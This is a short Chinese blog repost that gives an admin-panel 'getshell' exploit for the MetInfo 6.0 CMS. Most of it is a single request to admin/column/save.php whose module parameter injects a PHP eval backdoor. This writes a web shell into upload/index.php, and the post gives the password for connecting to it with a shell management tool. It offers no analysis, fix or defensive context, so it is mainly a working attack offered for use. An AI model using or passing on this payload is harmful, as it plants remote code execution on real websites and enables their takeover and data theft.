米拓6.0后台Getshell(MetInfo)

Posted 2020-12-15 muxueblog

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了米拓6.0后台Getshell(MetInfo)相关的知识，希望对你有一定的参考价值。

主要记录下Payload

登录到后台

Payload:
admin/column/save.php?name=123&action=editor&foldername=upload&module=22;@eval($_POST[‘cnm‘]);/*

shell管理工具连接 密码：cnm

Shell在upload目录下的index.php

www.xxx.com/upload/index.php

以上是关于米拓6.0后台Getshell(MetInfo)的主要内容，如果未能解决你的问题，请参考以下文章